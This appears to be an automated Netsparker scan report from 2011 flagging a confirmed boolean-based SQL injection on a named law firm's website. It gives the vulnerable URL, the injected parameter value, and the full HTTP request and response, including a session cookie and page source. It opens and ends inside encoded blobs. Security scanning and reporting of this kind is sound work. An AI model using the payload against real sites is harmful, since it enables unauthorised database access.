Q7Pj47Pjt0PGk8Mjg3PjtAPFNjaG9vbCBBdHRlbmRlZDtBbGJyaWdodCBDb2xsZWdlO0FsZnJlZCBVbml2ZXJzaXR5O0FtZXJpY2FuIFVuaXZlcnNpdHk7QW1lcmljYW4gVW5pdmVyc2l0eSwgV2FzaGluZ3RvbiBDb2xsZWdlIG9mIExhdztBbWhlcnN0IENvbGxlZ2U7QXJpem9uYSBTdGF0ZSBVbml2ZXJzaXR5O0JlbmphbWluIE4uIENhcmRvem8gU2Nob29sIG9mIExhdztCaW5naGFtdG9uIFVuaXZlcnNpdHk7Qm9zdG9uIENvbGxlZ2U7Qm9zdG9uIENvbGxlZ2UgTGF3IFNjaG9vbDtCb3N0b24gQ29sbGVnZSBTY2hvb2wgb2YgTWFuYWdlbWVudDtCb3N0b24gVW5pdmVyc2l0eTtCb3N0b24gVW5pdmVyc2l0eSBTY2hvb2wgb2YgTGF3O0Jvc3RvbiBVbml2ZXJzaXR5IFNjaG9vbCBvZiBNZWRpY2luZTtCb3N0b24gVW5pdmVyc2l0eSBTY2hvb2wgb2YgUHVibGljIEhlYWx0aDtCb3dkb2luIENvbGxlZ2U7QnJhbmRlaXMgVW5pdmVyc2l0eTtCcm9va2x5biBDb2xsZWdlO0Jyb29rbHluIExhdyBTY2hvb2w7QnJvd24gVW5pdmVyc2l0eTtCcnluIE1hd3IgQ29sbGVnZTtCdWNrbmVsbCBVbml2ZXJzaXR5O0NhbWJyaWRnZSBVbml2ZXJzaXR5O0NhcmxldG9uIFVuaXZlcnNpdHk7Q2FybmVnaWUtTWVsbG9uIFVuaXZlcnNpdHk7Q2FzZSBXZXN0ZXJuIFJlc2VydmUgVW5pdmVyc2l0eTtDYXNlIFdlc3Rlcm4gUmVzZXJ2ZSBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXcgO0Nhc2UgV2VzdGVybiBSZXNlcnZlIFVuaXZlcnNpdHkgU2Nob29sIG9mIE1lZGljaW5lO0NhdGhvbGljIFVuaXZlcnNpdHk7Q2F0aG9saWMgVW5pdmVyc2l0eSBvZiBBbWVyaWNhO0NhdGhvbGljIFVuaXZlcnNpdHkgb2YgQW1lcmljYSwgQ29sdW1idXMgU2Nob29sIG9mIExhdztDYXRob2xpYyBVbml2ZXJzaXR5IG9mIEFtZXJpY2EsIFNjaG9vbCBvZiBMYXc7Q2VudHJhbCBDb25uZWN0aWN1dCBTdGF0ZSBVbml2ZXJzaXR5O0NlbnRyYWwgTWljaGlnYW4gVW5pdmVyc2l0eTtDaGFtcGxhaW4gQ29sbGVnZTtDaXR5IENvbGxlZ2Ugb2YgdGhlIENpdHkgVW5pdmVyc2l0eSBvZiBOZXcgWW9yaztDbGFyayBVbml2ZXJzaXR5O0NsZXZlbGFuZC1NYXJzaGFsbCBDb2xsZWdlIG9mIExhdztDb2xieSBDb2xsZWdlO0NvbGdhdGUgVW5pdmVyc2l0eTtDb2xsZWdlIG9mIFNhaW50IEVsaXphYmV0aDtDb2xsZWdlIG9mIHRoZSBIb2x5IENyb3NzO0NvbGxlZ2Ugb2YgdGhlIEhvbHkgQ3Jvc3M7Q29sbGVnZSBvZiBXaWxsaWFtICYgTWFyeTtDb2xsZWdlIG9mIFdpbGxpYW0gYW5kIE1hcnkgU2Nob29sIG9mIExhdztDb2xvcmFkbyBDb2xsZWdlO0NvbHVtYmlhIExhdyBTY2hvb2w7Q29sdW1iaWEgVW5pdmVyc2l0eTtDb2x1bWJpYSBVbml2ZXJzaXR5IFNjaG9vbCBvZiBJbnRlcm5hdGlvbmFsIEFmZmFpcnM7Q29sdW1iaWEgVW5pdmVyc2l0eSBTY2hvb2wgb2YgTGF3O0Nvbm5lY3RpY3V0IENvbGxlZ2U7Q29ybmVsbCBVbml2ZXJzaXR5O0Nvcm5lbGwgVW5pdmVyc2l0eSBDb2xsZWdlIG9mIEVuZ2luZWVyaW5nO0Nvcm5lbGwgVW5pdmVyc2l0eSBMYXcgU2Nob29sO0RhcnRtb3V0aCBDb2xsZWdlO0Rlbmlzb24gVW5pdmVyc2l0eTtEaWNraW5zb24gQ29sbGVnZTtEaWNraW5zb24gU2Nob29sIG9mIExhdztEcmV3IFVuaXZlcnNpdHk7RHVrZSBVbml2ZXJzaXR5O0R1a2UgVW5pdmVyc2l0eSBTY2hvb2wgb2YgTGF3O0R1cXVlc25lIFVuaXZlcnNpdHk7RHVxdWVzbmUgVW5pdmVyc2l0eSBTY2hvb2wgb2YgTGF3O0VhcmxoYW0gQ29sbGVnZTtFbWVyc29uIENvbGxlZ2U7RW1vcnkgVW5pdmVyc2l0eTtFbW9yeSBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXc7RmFpcmZpZWxkIFVuaXZlcnNpdHk7RmFpcmxlaWdoIERpY2tpbnNvbiBVbml2ZXJzaXR5O0Zsb3JpZGEgQXRsYW50aWMgVW5pdmVyc2l0eTtGb3JkaGFtIFVuaXZlcnNpdHk7Rm9yZGhhbSBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXc7RnJhbmtsaW4gJmFtcFw7IE1hcnNoYWxsIENvbGxlZ2U7RnJhbmtsaW4gUGllcmNlIExhdyBDZW50ZXI7RnVkYW4gVW5pdmVyc2l0eTtHZW9yZ2UgV2FzaGluZ3RvbiBTY2hvb2wsIFRoZSBOYXRpb25hbCBMYXcgQ2VudGVyO0dlb3JnZSBXYXNoaW5ndG9uIFVuaXZlcnNpdHk7R2VvcmdlIFdhc2hpbmd0b24gVW5pdmVyc2l0eSBMYXcgU2Nob29sO0dlb3JnZXRvd24gVW5pdmVyc2l0eTtHZW9yZ2V0b3duIFVuaXZlcnNpdHkgTGF3IENlbnRlcjtHZXR0eXNidXJnIENvbGxlZ2U7R3VpbGZvcmQgQ29sbGVnZTtHdXN0YXZ1cyBBZG9scGh1cyBDb2xsZWdlO0d3eW5lZGQtTWVyY3kgQ29sbGVnZTtIYW1pbHRvbiBDb2xsZWdlO0hhcnR0IFNjaG9vbCwgVW5pdmVyc2l0eSBvZiBIYXJ0Zm9yZDtIYXJ2YXJkIENvbGxlZ2U7SGFydmFyZCBMYXcgU2Nob29sO0hhcnZhcmQgVW5pdmVyc2l0eTtIb2ZzdHJhIFVuaXZlcnNpdHk7SG9mc3RyYSBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXc7SG93YXJkIFVuaXZlcnNpdHkgU2Nob29sIG9mIExhdztIdW50ZXIgQ29sbGVnZTtJbmRpYW5hIFVuaXZlcnNpdHkgb2YgUGVubnN5bHZhbmlhO0luZGlhbmEgVW5pdmVyc2l0eSBTY2hvb2wgb2YgTGF3O0lvd2EgU3RhdGUgVW5pdmVyc2l0eTtJdGhhY2EgQ29sbGVnZTtKb2huIENhcnJvbGwgVW5pdmVyc2l0eTtKb2huIE1hcnNoYWxsIExhdyBTY2hvb2w7Sm9obnMgSG9wa2lucyBVbml2ZXJzaXR5O0tlYW4gVW5pdmVyc2l0eTtLZW50IFN0YXRlIFVuaXZlcnNpdHk7S2VueW9uIENvbGxlZ2U7TGEgU2FsbGUgVW5pdmVyc2l0eTtMYWZheWV0dGUgQ29sbGVnZTtMYXdyZW5jZSBUZWNobm9sb2d5IFVuaXZlcnNpdHk7TGVoaWdoIFVuaXZlcnNpdHk7TG9uZyBJc2xhbmQgVW5pdmVyc2l0eTtMb3lvbGEgQ29sbGVnZTtMb3lvbGEgQ29sbGVnZSBpbiBNYXJ5bGFuZDtNYXJpc3QgQ29sbGVnZTtNYXJzaGFsbC1XeXRoZSBTY2hvb2wgb2YgTGF3LCBDb2xsZWdlIG9mIFdpbGxpYW0gJmFtcFw7IE1hcnk7TWFzc2FjaHVzZXR0cyBDb2xsZWdlIG9mIExpYmVyYWwgQXJ0cztNYXNzYWNodXNldHRzIEluc3RpdHV0ZSBvZiBUZWNobm9sb2d5O01pYW1pIE9oaW8gVW5pdmVyc2l0eSA7TWlhbWkgVW5pdmVyc2l0eTtNaWNoaWdhbiBTdGF0ZSBVbml2ZXJzaXR5IENvbGxlZ2Ugb2YgTGF3O01pZGRsZWJ1cnkgQ29sbGVnZTtNaXNzaXNzaXBwaSBTdGF0ZSBVbml2ZXJzaXR5O01vbm1vdXRoIENvbGxlZ2U7TW9udGNsYWlyIFN0YXRlIFVuaXZlcnNpdHk7TXVobGVuYmVyZyBDb2xsZWdlO05ldyBFbmdsYW5kIFNjaG9vbCBvZiBMYXc7TmV3IEplcnNleSBJbnN0aXR1dGUgb2YgVGVjaG5vbG9neTtOZXcgWW9yayBMYXcgU2Nob29sO05ldyBZb3JrIFVuaXZlcnNpdHk7TmV3IFlvcmsgVW5pdmVyc2l0eSBTY2hvb2wgb2YgTGF3O05vcnRoZWFzdGVybiBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXc7Tm9ydGh3ZXN0ZXJuIFVuaXZlcnNpdHk7Tm9ydGh3ZXN0ZXJuIFVuaXZlcnNpdHkgU2Nob29sIG9mIExhdztOb3RyZSBEYW1lIExhdyBTY2hvb2w7T2Frd29vZCBDb2xsZWdlO09iZXJsaW4gQ29sbGVnZTtPaGlvIE5vcnRoZXJuIFVuaXZlcnNpdHkgU2Nob29sIG9mIExhdztPaGlvIFN0YXRlIFVuaXZlcnNpdHk7T3hmb3JkIFVuaXZlcnNpdHk7UGFjZSBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXc7UGVubnN5bHZhbmlhIFN0YXRlIFVuaXZlcnNpdHk7UGVubnN5bHZhbmlhIFN0YXRlIFVuaXZlcnNpdHksIERpY2tpbnNvbiBTY2hvb2wgb2YgTGF3O1ByaW5jZXRvbiBVbml2ZXJzaXR5O1Byb3ZpZGVuY2UgQ29sbGVnZTtQdXJkdWUgVW5pdmVyc2l0eTtRdWlubmlwYWMgVW5pdmVyc2l0eTtRdWlubmlwaWFjIENvbGxlZ2U7UXVpbm5pcGlhYyBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXc7UmFtYXBvIENvbGxlZ2U7UmhvZGUgSXNsYW5kIENvbGxlZ2U7UmljZSBVbml2ZXJzaXR5O1JpZGVyIENvbGxlZ2U7Um9nZXIgV2lsbGlhbXMgVW5pdmVyc2l0eTtSb3dhbiBVbml2ZXJzaXR5O1J1dGdlcnMgQ29sbGVnZTtSdXRnZXJzIExhdyBTY2hvb2w7UnV0Z2VycyBTY2hvb2wgb2YgTGF3O1J1dGdlcnMgVW5pdmVyc2l0eTtSdXRnZXJzIFVuaXZlcnNpdHkgR3JhZHVhdGUgU2Nob29sIG9mIExpYnJhcnkgYW5kIEluZm9ybWF0aW9uIFN0dWRpZXM7UnV0Z2VycyBVbml2ZXJzaXR5IFNjaG9vbCBvZiBFbmdpbmVlcmluZztSdXRnZXJzIFVuaXZlcnNpdHkgU2Nob29sIG9mIExhdztSdXRnZXJzIFVuaXZlcnNpdHkgU2Nob29sIG9mIExhdyAtIENhbWRlbjtSdXRnZXJzIFVuaXZlcnNpdHkgU2Nob29sIG9mIExhdyAtIE5ld2FyaztSdXRnZXJzIFVuaXZlcnNpdHktUnV0Z2VycyBDb2xsZWdlO1NhY3JlZCBIZWFydCBVbml2ZXJzaXR5O1NhaW50IExvdWlzIFVuaXZlcnNpdHkgU2Nob29sIG9mIExhdztTYWludCBQZXRlcuKAmXMgQ29sbGVnZTtTYWludCBWaW5jZW50IENvbGxlZ2U7U2F3eWVyIFNjaG9vbCBvZiBNYW5hZ2VtZW50O1NldG9uIEhhbGwgVW5pdmVyc2l0eTtTZXRvbiBIYWxsIFVuaXZlcnNpdHkgU2Nob29sIG9mIExhdztTaGFuZ2hhaSBJbnRlcm5hdGlvbmFsIFN0dWRpZXMgVW5pdmVyc2l0eTtTaW1tb25zIENvbGxlZ2U7U2ltbW9ucyBDb2xsZWdlIFNjaG9vbCBvZiBTb2NpYWwgV29yaztTbWl0aCBDb2xsZWdlO1NvdXRoZWFzdCBNaXNzb3VyaSBTdGF0ZSBVbml2ZXJzaXR5O1NvdXRod2VzdGVybiBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXc7U3QuICBKb2huJ3MgVW5pdmVyc2l0eSBTY2hvb2wgb2YgTGF3IDtTdC4gSm9obuKAmXMgVW5pdmVyc2l0eSBMYXcgU2Nob29sO1N0LiBKb3NlcGjigJlzIFVuaXZlcnNpdHk7U3QuIE1pY2hhZWwncztTdGFuZm9yZCBMYXcgU2Nob29sO1N0YW5mb3JkIFVuaXZlcnNpdHk7U3RhdGUgVW5pdmVyc2l0eSBvZiBOZXcgWW9yayBhdCBBbGJhbnk7U3RhdGUgVW5pdmVyc2l0eSBvZiBOZXcgWW9yayBhdCBCaW5naGFtdG9uO1N0YXRlIFVuaXZlcnNpdHkgb2YgTmV3IFlvcmsgYXQgQnVmZmFsbztTdGF0ZSBVbml2ZXJzaXR5IG9mIE5ldyBZb3JrIGF0IFN0b255IEJyb29rO1N0ZXZlbnMgSW5zdGl0dXRlIG9mIFRlY2hub2xvZ3k7U3RvbmVoaWxsIENvbGxlZ2U7U3VmZm9sayBVbml2ZXJzaXR5O1N1ZmZvbGsgVW5pdmVyc2l0eSBMYXcgU2Nob29sO1N5cmFjdXNlIFVuaXZlcnNpdHk7U3lyYWN1c2UgVW5pdmVyc2l0eSBDb2xsZWdlIG9mIExhdztUZW1wbGUgVW5pdmVyc2l0eTtUZW1wbGUgVW5pdmVyc2l0eSBCZWFzbGV5IFNjaG9vbCBvZiBMYXc7VGVtcGxlIFVuaXZlcnNpdHkgSmFtZXMgRS4gQmVhc2xleSBTY2hvb2wgb2YgTGF3O1RlbXBsZSBVbml2ZXJzaXR5IFNjaG9vbCBvZiBMYXc7VGV4YXMgQSZNIFVuaXZlcnNpdHk7VGhlIENhdGhvbGljIFVuaXZlcnNpdHkgb2YgQW1lcmljYTtUaGUgQ29sbGVnZSBvZiBOZXcgSmVyc2V5O1RoZSBDb2xsZWdlIG9mIFdvb3N0ZXI7VGhlIEdlb3JnZSBXYXNoaW5ndG9uIFVuaXZlcnNpdHkgTGF3IFNjaG9vbDtUaGUgTmF0aW9uYWwgTGF3IENlbnRlciwgR2VvcmdlIFdhc2hpbmd0b24gVW5pdmVyc2l0eTtUaGUgVW5pdmVyc2l0eSBvZiBOb3J0aCBDYXJvbGluYSBhdCBDaGFwZWwgSGlsbDtUaGUgVW5pdmVyc2l0eSBvZiBUb2t5bztUb3VybyBDb2xsZWdlO1RyaW5pdHkgQ29sbGVnZTtUcmluaXR5IENvbGxlZ2Ugb2YgVmVybW9udDtUdWZ0cyBVbml2ZXJzaXR5O1R1ZnRzIFVuaXZlcnNpdHkgU2Nob29sIG9mIE1lZGljaW5lO1VuaW9uIENvbGxlZ2U7VW5pdGVkIFN0YXRlcyBNaWxpdGFyeSBBY2FkZW15IGF0IFdlc3QgUG9pbnQ7VW5pdmVyc2l0eSBvZiBBcml6b25hO1VuaXZlcnNpdHkgb2YgQ2FsaWZvcm5pYSBhdCBCZXJrZWxleSA7VW5pdmVyc2l0eSBvZiBDYWxpZm9ybmlhIEJlcmtlbGV5LCBCb2FsdCBIYWxsIFNjaG9vbCBvZiBMYXc7VW5pdmVyc2l0eSBvZiBDYWxpZm9ybmlhIFNhbiBEaWVnbywgU2Nob29sIG9mIE1lZGljaW5lO1VuaXZlcnNpdHkgb2YgQ2hpY2FnbztVbml2ZXJzaXR5IG9mIENoaWNhZ287VW5pdmVyc2l0eSBvZiBDaGljYWdvIExhdyBTY2hvb2w7VW5pdmVyc2l0eSBvZiBDb2xvcmFkbywgU2Nob29sIG9mIEJ1c2luZXNzO1VuaXZlcnNpdHkgb2YgQ29ubmVjdGljdXQ7VW5pdmVyc2l0eSBvZiBDb25uZWN0aWN1dCBTY2hvb2wgb2YgTGF3O1VuaXZlcnNpdHkgb2YgRGVsYXdhcmU7VW5pdmVyc2l0eSBvZiBEZW52ZXI7VW5pdmVyc2l0eSBvZiBEZW52ZXIgU3R1cm0gQ29sbGVnZSBvZiBMYXc7VW5pdmVyc2l0eSBvZiBGbG9yaWRhO1VuaXZlcnNp..
Boolean Based SQL Injection

Boolean Based SQL Injection

6 TOTAL
CRITICAL
CONFIRMED
6
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?show=-1+OR+17-7%3d10

Parameters

Parameter Type Value
show GET -1 OR 17-7=10

Request

GET /new/showlocationnew.aspx?show=-1+OR+17-7%3d10 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:20:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33451



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css">
P,TD,DIV,SPAN {
COLOR: #666666;
font-family: Arial;
font-size: 11px;
}
FONT {
COLOR: #666666;
font-family: Arial;
font-size: 11px;
}
body {
<!--SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #969696; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #969696; SCROLLBAR-DARKSHADOW-COLOR: #000000;-->
scrollbar-face-color:#ffffff;scrollbar-arrow-color:#000000;scrollbar-track-color:#ffffff;scrollbar-shadow-color:#ffffff;scrollbar-highlight-color:#ffffff;scrollbar-3dlight-color:#ffffff;scrollbar-darkshadow-color:#ffffff;
}
</style>
</HEAD>
<body vLink="#666666" aLink="#666666" link="#666666" style="Margin-left:0;Margin-top:10;margin-bottom:0">
<form name="Form1" method="post" action="showlocationnew.aspx?show=-1+OR+17-7%3d10" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM+Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA+O2k8MT47PjtsPHQ8O2w8aTwzPjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciBcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQyNiIgYmlvc25ldy5hc3B4P1NlYXJjaD0nVHJ1ZSZhbXBcO0xvY2F0aW9uPTI1MzAiJyB3d3cyIHd3dy5tY2NhcnRlci5jb20gaHR0cDpcPk5FV0FSSyZuYnNwXDtPZmZpY2UgTGF3eWVyc1w8L2FcPlw8L3N0cm9uZ1w+XDwvcFw+DQpcPHBcPlw8Zm9vIGZhY2U9QXJpYWwsSGVsdmV0aWNhIHNpemU9Mlw+XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gdGhlIE5FV0FSSyBPZmZpY2U6XDwvc3Ryb25nXD5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPGZvbyBmYWNlPUFyaWFsLEhlbHZldGljYSBzaXplPTJcPlw8c3Ryb25nXD5Gcm9tIHBvaW50cyBpbiBOZXcgSmVyc2V5Olw8L3N0cm9uZ1w+XDwvcFw+DQpcPHBcPlw8c3Ryb25nXD5HYXJkZW4gU3RhdGUgUGFya3dheTogXDwvc3Ryb25nXD5UYWtlIFw8Zm9vIHNpemU9Mlw+R2FyZGVuIFN0YXRlIFBhcmt3YXkgdG8gRXhpdCAxNDUuIEZvbGxvdyBzaWducyZuYnNwXDtvbnRvJm5ic3BcO1J0IDI4MCBFYXN0LiBXaGVuIDI4MCBmb3JrcyAtIHN0YXkgcmlnaHQsIGZvbGxvd2luZyBzaWducyBmb3IgSGFycmlzb24uIEV4aXQgYXQgMTUgKFJ0LiAyMSBTb3V0aC1Eb3dudG93bikuIFByb2NlZWQgdG8gdGhlIGJvdHRvbSBvZiB0aGUgcmFtcC4gVHVybiByaWdodCBvbnRvIFJ0LiAyMSAoTWNDYXJ0ZXIgSGlnaHdheSkgYW5kIHByb2NlZWQgMSBtaWxlIHRvIHRoZSBpbnRlcnNlY3Rpb24gTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0LiZuYnNwXDsgVHVybiByaWdodCBhdCB0aGUgaW50ZXJzZWN0aW9uIG9udG8gKE1hcmtldCBTdHJlZXQpJm5ic3BcOyBQcm9jZWVkIGFwcHJveGltYXRlbHkgMTUwIGZlZXQgdHVybmluZyZuYnNwXDtyaWdodCBhdCB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuIChUaGUgZW50cmFuY2UgdG8gdGhlIGRyaXZld2F5IGlzIGxvY2F0ZWQganVzdCZuYnNwXDtiZWZvcmUgdGhlIG5leHQgdHJhZmZpYyBsaWdodCkuJm5ic3BcOyBBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2smbmJzcFw7eW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycmbmJzcFw7cGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCZuYnNwXDt0byB0aGUmbmJzcFw7MTV0aCBmbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPHN0cm9uZ1w+Um91dGUgNzgvMjQgRWFzdDpcPC9zdHJvbmdcPiBcPGZvbyBzaXplPT